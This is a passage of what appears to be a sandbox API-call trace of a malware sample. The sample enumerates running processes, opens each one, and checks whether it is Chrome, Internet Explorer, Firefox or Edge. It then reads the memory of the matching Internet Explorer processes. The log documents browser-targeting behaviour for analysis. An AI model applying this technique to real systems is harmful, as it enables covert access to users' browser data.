	[0239.677] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.677] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0239.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.677] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.678] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0239.678] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x8104
	[0239.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.678] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0239.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.726] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.726] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0239.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.727] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.727] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0239.728] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x8108
	[0239.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.728] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.728] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.729] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0239.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.729] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.729] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0239.730] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x810c
	[0239.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.730] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0239.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.731] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.731] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0239.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.731] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.732] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0239.732] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x8110
	[0239.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.732] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0239.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.733] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.733] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0239.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.733] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.734] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0239.734] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x8114
	[0239.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.735] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0239.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.735] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.735] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0239.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.735] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.736] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0239.736] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x8118
	[0239.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.736] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0239.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.737] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.737] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0239.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.738] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.738] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0239.739] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0239.739] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0239.739] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x811c
	[0239.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.740] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0239.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.740] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.741] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0239.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.742] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.742] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0239.743] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x8120
	[0239.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.743] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0239.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.744] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.744] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0239.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.744] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.744] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0239.745] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x8124
	[0239.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.745] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0239.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.746] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.746] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0239.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.746] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.747] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0239.747] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x8128
	[0239.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.747] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0239.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.748] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.748] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0239.749] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.749] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.749] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0239.750] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x812c
	[0239.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.750] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0239.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.750] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.751] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0239.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.751] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.752] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0239.753] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x8130
	[0239.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.753] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0239.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.753] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.753] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0239.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.754] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.754] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0239.755] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x8134
	[0239.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.755] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0239.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.755] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.756] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0239.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.756] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.757] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0239.758] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x8138
	[0239.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.758] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0239.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.758] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.759] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0239.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.760] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.760] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0239.761] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x813c
	[0239.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.761] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0239.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.762] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.762] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0239.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.762] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.762] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0239.763] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x8140
	[0239.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.763] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0239.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.764] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.764] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0239.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.764] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.764] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0239.765] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x8144
	[0239.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.765] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0239.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.766] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.766] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0239.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.767] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.767] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0239.768] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x8148
	[0239.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.768] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0239.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.769] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.769] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0239.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.770] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.770] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0239.771] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x814c
	[0239.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.771] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0239.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.772] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.820] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.821] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0239.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.821] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.821] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0239.822] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x8150
	[0239.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.822] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0239.823] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.824] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.824] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.824] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0239.825] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.825] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.826] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0239.827] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x8154
	[0239.827] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.827] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0239.827] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.828] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.828] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.828] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0239.828] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.828] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.829] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0239.830] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x8158
	[0239.830] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.830] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0239.830] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.830] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0239.830] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.830] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0239.831] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.831] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.831] NtQueryInformationProcess (in: ProcessHandle=0x8158, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0239.831] ReadProcessMemory (in: hProcess=0x8158, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0239.831] ReadProcessMemory (in: hProcess=0x8158, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0239.831] ReadProcessMemory (in: hProcess=0x8158, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0239.831] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0239.832] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0239.832] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x815c
	[0239.833] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.833] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0239.833] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.833] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0239.833] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.833] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0239.834] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
